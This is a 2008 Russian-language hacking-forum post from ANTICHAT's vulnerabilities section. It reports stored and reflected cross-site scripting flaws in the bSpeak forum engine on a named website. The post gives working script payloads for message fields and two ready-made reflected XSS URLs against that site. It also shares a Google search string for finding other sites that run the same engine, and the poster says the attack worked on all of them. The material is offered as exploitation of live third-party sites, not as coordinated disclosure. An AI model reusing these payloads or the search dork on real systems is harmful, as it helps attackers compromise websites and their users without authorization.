HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Активные Xss
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #11  
Старый 13.03.2008, 13:52
Horsekiller
Познающий
Регистрация: 22.11.2006
Сообщений: 68
С нами: 10245582

Репутация: 137
По умолчанию
Цитата:
Сообщение от ЛифчиС5СВ  
www.26thavenue.com
Поковырял еще немного.

Кроме этого в bMail (типа личные сообщения) уязвимо для простейшей XSS поле Subject.
Так же просто вставляем
Код:
<script>alert(/Xss/)</script>
Потом еще при отправке сообщений - поля
Link URL,
Link Title.
Код:
"><script>alert()</script>
Забил в гугл
Цитата:
powered by bSpeak
попробовал в нескольких местах, везде работает.

Кроме этого есть пассивные XSS в этом движке, пример -
Код:
http://www.26thavenue.com/bspeakdemo/index.php?action=login&msg=%3Cscript%3Ealert()%3C/script%3E
или в другом месте -
Код:
http://www.26thavenue.com/bspeakdemo/index.php?action=retrieve&msg=%3Cscript%3Ealert()%3C/script%3E
Последний раз редактировалось Horsekiller; 13.03.2008 в 14:05..
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Xss bx_N Forum for discussion of ANTICHAT 7 11.03.2007 19:17
mylivepage.ru активные XSS __XT__ Уязвимости 3 23.12.2006 14:31



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.